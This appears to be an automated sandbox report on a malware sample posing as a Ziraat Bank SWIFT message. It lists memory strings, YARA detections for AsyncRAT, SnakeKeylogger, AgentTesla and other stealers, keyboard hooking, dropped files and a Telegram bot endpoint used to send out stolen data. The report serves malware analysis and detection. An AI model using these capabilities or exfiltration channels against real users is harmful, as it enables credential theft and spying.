Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.0000000004164000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2942525040.000000001D380000.00000004.08000000.00040000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000000.2120832413.0000000000592000.00000002.00000001.01000000.0000000D.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: XClient.exe, 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000015.00000002.2419525298.000001E8BC113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.2419525298.000001E8BC113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.2419525298.000001E8BC113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004052000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.2419525298.000001E8BC113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: XClient.exe, 00000008.00000002.2652391836.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: XClient.exe, 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: XClient.exe, 00000008.00000002.2652391836.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Phoenix Stealer

Source: Yara match

File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: XClient.exe.7.dr, XLogger.cs

.Net Code: KeyboardLayout

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\XClient.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.0.XClient.exe.8c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.XClient.exe.2ce4f08.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.XClient.exe.1d020000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.XClient.exe.1d020000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File dump: XClient.exe.8.dr 665641472			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File dump: apihost.exe.8.dr 665641472			Jump to dropped file

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0127D344	0_2_0127D344
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_07129660	0_2_07129660
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0712B6E8	0_2_0712B6E8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_07120559	0_2_07120559
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_07120560	0_2_07120560
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_07129228	0_2_07129228
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0712AD38	0_2_0712AD38
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0712A900	0_2_0712A900
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0712A8EF	0_2_0712A8EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0AF71030	0_2_0AF71030
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_0100DC74	9_2_0100DC74
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E26B0	9_2_069E26B0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E57D0	9_2_069E57D0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E2070	9_2_069E2070
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E2E18	9_2_069E2E18
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E0FB0	9_2_069E0FB0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E6FE8	9_2_069E6FE8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E8F38	9_2_069E8F38
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E9F48	9_2_069E9F48
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E1C08	9_2_069E1C08
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069EEC50	9_2_069EEC50
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E3DF0	9_2_069E3DF0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E4918	9_2_069E4918
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E26A0	9_2_069E26A0
